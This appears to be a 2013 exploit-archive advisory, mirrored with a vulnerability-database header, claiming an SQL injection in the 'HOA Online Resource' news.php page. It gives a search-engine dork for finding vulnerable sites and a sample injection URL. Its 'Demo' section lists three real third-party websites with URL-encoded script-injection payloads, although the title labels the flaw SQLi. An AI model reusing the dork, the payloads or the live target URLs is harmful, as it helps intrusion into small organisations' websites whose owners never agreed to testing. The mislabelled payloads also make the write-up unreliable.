HOA Online Resource <= Remote (news.php) SQLi Vulnerability

🗓️ 07 Apr 2013 00:00:00Reported by The Black DevilsType

zdt🔗 0day.today👁 18 Views

HOA Online Resource <= Remote (news.php) SQLi Vulnerability - 2013-03-1

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm The Black Devils member from Inj3ct0r Team         1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title :  HOA Online Resource <= Remote (news.php) SQLi Vulnerability
# Date: 2013-03-15
# Software Link: http://www.hoaonlineresource.com/
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : "Design by HOA Online Resource " inurl:"news.php?id="
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337
 
# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils
-----------
 
 
http://127.0.0.1/path/News.php?ID=[ SQLi ]

Error 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /homepages/1/d281725239/htdocs/foxhollowhoa/news.php on line 22
  
 
# Demo :
http://www.foxhollowhoa.org/news.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://www.nashuaspecialolympics.org/news.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
http://concertoloftshoa.com/news.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27
-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe  CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz
-----------
 Contact:
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : [email protected]

#  0day.today [2018-03-01]  #

07 Apr 2013 00:00Current

7.1High risk

Vulners AI Score7.1